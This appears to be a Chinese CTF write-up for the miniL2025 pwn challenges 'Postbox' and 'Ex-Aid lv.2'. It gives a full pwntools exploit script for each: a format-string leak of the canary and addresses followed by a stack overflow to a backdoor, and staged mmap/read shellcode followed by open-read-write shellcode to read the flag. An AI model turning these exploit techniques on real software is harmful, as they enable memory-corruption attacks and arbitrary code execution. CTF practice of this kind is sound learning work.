Featured image of post miniL2025_wp
miniL2025

miniL2025_wp

pwn&misc

最后更新于:
|
|
|

Postbox

你的好朋友李华刚学C语言,写了个看起来不是很安全的程序。他却自信地说:“那个缓冲区溢出我是知道的,这个程序没问题!” 你刚好在学pwn,不如试试他的程序安不安全?

menu,实际上1没什么用,因为计数要到2里再去算,

关键函数,我们要让v4=114514然后使得缓冲区不断增大最后可以溢出去获取shell,用格式化字符串第一次打印出需要的地址的同时向a1中写入数字使得可以在此进入循环(至少两次才可以有足够空间打通)
同时要注意由于v4和buf紧贴的关系输入的时候有一个字节会覆盖在v4上,所以我们只能输入'0’才能绕过

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
context.terminal=["tmux","splitw","-h"]
def VIO_TEXT(x):
    return f"\x1b[95m{x}\x1b[0m"

#io=process("./pwn")
elf=ELF("./pwn")
io=remote("198.18.0.1",64318)
# gdb.attach(io,gdbscript="""
# b *$rebase(0x13ec) 
# b *$rebase(0x1569) #断在printf中间进行调试
# """)
se      = lambda data               :io.send(data) 
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
rc      = lambda num                  :io.recv(num)
rl      = lambda                    :io.recvline()
ru      = lambda delims             :io.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, b'\x00'))    
uu64    = lambda data               :u64(data.ljust(8, b'\x00'))
ia        = lambda                    :io.interactive()
get_64  = lambda                    :u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
get_32  = lambda                    :u32(io.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))

def send(content):
    sla(b"Give me your choice:\n",'1')
    sa(b"contents:\n",content)

def script(content):
    sla(b"Give me your choice:\n",'2')
    sa(b"contents:\n",content)

main_off=elf.sym['main']
backdoor_off=elf.sym['Inval1dFunction']

payload=cyclic(0x2fc)+p64(114514) #由于没有初始化变量才导致有残留,借由send 和 script的偏移量填充才可以覆盖到
script(payload)
ru(b'contents:\n')
# se(b"0"+b"-%p"*50)  #用于伪造进行泄露
se(b"0"+b"%3c%7$n"+b"-%43$p"+b'-%57$p')  #用于伪造进行泄露,爆出canary和其他地址
io.recv()
ru(b"-0x")
canary=int(rc(16),16)
ru(b'-0x')
main_addr=int(io.recv(12),16)
log.success(VIO_TEXT(f"canary:{hex(canary)}"))
log.success(VIO_TEXT(f"main_addr:{hex(main_addr)}"))
backdoor=main_addr-main_off+backdoor_off
log.success(VIO_TEXT(f"backdoor_addr:{hex(backdoor)}"))

payload=cyclic(264)+p64(canary)+p64(0)+p64(backdoor)
# pause()
io.recv()
se(payload)
payload=cyclic(264)+p64(canary)+p64(0)+p64(backdoor+0x8) #跳过栈开辟
io.recv()
se(payload)
sl(b"cat flag")
io.interactive()

Ex-Aid lv.2

CHECKIN Bugster

给大家推荐一下学长用c&cpp重写的seccomp-tools——ceccomp!
并且收录到aur库中,yay一键安装,快捷而方便的make install胜过seccomp,并且有非常好的补全完善

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93

from pwn import *
from pwn import shellcraft
context(log_level="debug", os="linux", arch="amd64")
context.terminal = ["tmux", "splitw", "-h"]
def VIO_TEXT(x):
    return f"\x1b[95m{x}\x1b[0m"

io = process("./pwn")
# io = remote("172.17.0.1",42583)

# gdb.attach(io,gdbscript="""
#     b *$rebase(0x14ff)
# """)


def se(data):
    return io.send(data)

def sa(delim, data):
    return io.sendafter(delim, data)

def sl(data):
    return io.sendline(data)

def sla(delim, data):
    return io.sendlineafter(delim, data)

def rc(num):
    return io.recv(num)

def rl():
    return io.recvline()

def ru(delims):
    return io.recvuntil(delims)

def uu32(data):
    return u32(data.ljust(4, b"\x00"))

def uu64(data):
    return u64(data.ljust(8, b"\x00"))

def ia():
    return io.interactive()

def get_64():
    return u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))

def get_32():
    return u32(io.recvuntil(b"\xf7")[-4:].ljust(4, b"\x00"))


shellcode = asm('''
    xor edi,edi
    mov esi,4096
    mov r10,0x22
    add ebx,21
    add rdx,0x20 
    jmp rdx 
    nop

    mov eax,9 
    not r8
    mov r9,0 
    add rdx,0x20 
    jmp rdx 
    nop 
    nop 
    nop 

    mov edx,7 
    syscall 
    mov rsi,rax 
    xor eax,eax 
    mov rdx,0x100 
    syscall 
    jmp rsi 
    ''')
# add rdx,0x20实现短跳buf[0]-buf[2],三段都填满0x18字节,buf[0]设置参数,buf[1]准备调用,buf[2]调用mmap后保存返回地址到rsi,再次调用read(eax=0),实现orw
info("then:len of shellcode is %d" % len(shellcode))
sa(b"signin~", shellcode)

shellcode = ""
shellcode += shellcraft.open("./flag")
shellcode += shellcraft.read("rax", "rsp", 0x100)
shellcode += shellcraft.write(1, "rsp", 0x100)
info("then:len of shellcode2 is %d"%len(shellcode))

payload = asm(shellcode)
pause(1)
se(payload)

io.interactive()